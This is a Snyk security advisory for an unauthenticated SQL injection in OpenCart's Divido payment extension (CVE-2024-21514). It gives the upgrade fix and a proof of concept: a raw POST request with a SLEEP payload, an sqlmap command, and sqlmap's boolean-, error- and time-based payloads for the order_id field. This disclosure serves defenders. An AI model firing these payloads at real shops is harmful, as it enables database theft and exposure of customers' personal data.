SQL Injection Affecting opencart/opencart package, versions <3.0.4.0
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-OPENCARTOPENCART-7266565
- published 21 Jun 2024
- disclosed 21 Jun 2024
- credit Calum Hutton
Introduced: 21 Jun 2024
CVE-2024-21514 Open this link in a new tabHow to fix?
Upgrade opencart/opencart to version 3.0.4.0 or higher.
Overview
opencart/opencart is a shopping cart system
Affected versions of this package are vulnerable to SQL Injection. An SQL Injection issue was identified in the Divido payment extension for OpenCart, which is included by default in version 3.0.3.9. As an anonymous unauthenticated user, if the Divido payment module is installed (it does not have to be enabled), it is possible to exploit SQL injection to gain unauthorised access to the backend database. For any site which is vulnerable, any unauthenticated user could exploit this to dump the entire OpenCart database, including customer PII data.
PoC
This can be exploited with a POST request to /index.php?route=extension/payment/divido/update which will delay the response for 5 seconds.
POST http://localhost/index.php?route=extension/payment/divido/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/json
content-length: 44
{"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}
Using this request in SQLmap it identified three different payload types:
python3 sqlmap.py -vv -r /tmp/oc2.raw --level 3 --risk 2
...
Parameter: JSON #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: {"status":true,"metadata":{"order_id":"1 AND 7610=(SELECT (CASE WHEN (7610=7610) THEN 7610 ELSE (SELECT 7298 UNION SELECT 8143) END))-- -"}}
Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: {"status":true,"metadata":{"order_id":"1 AND EXTRACTVALUE(2524,CONCAT(0x5c,0x716a7a6a71,(SELECT (ELT(2524=2524,1))),0x71716b7071))"}}
Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])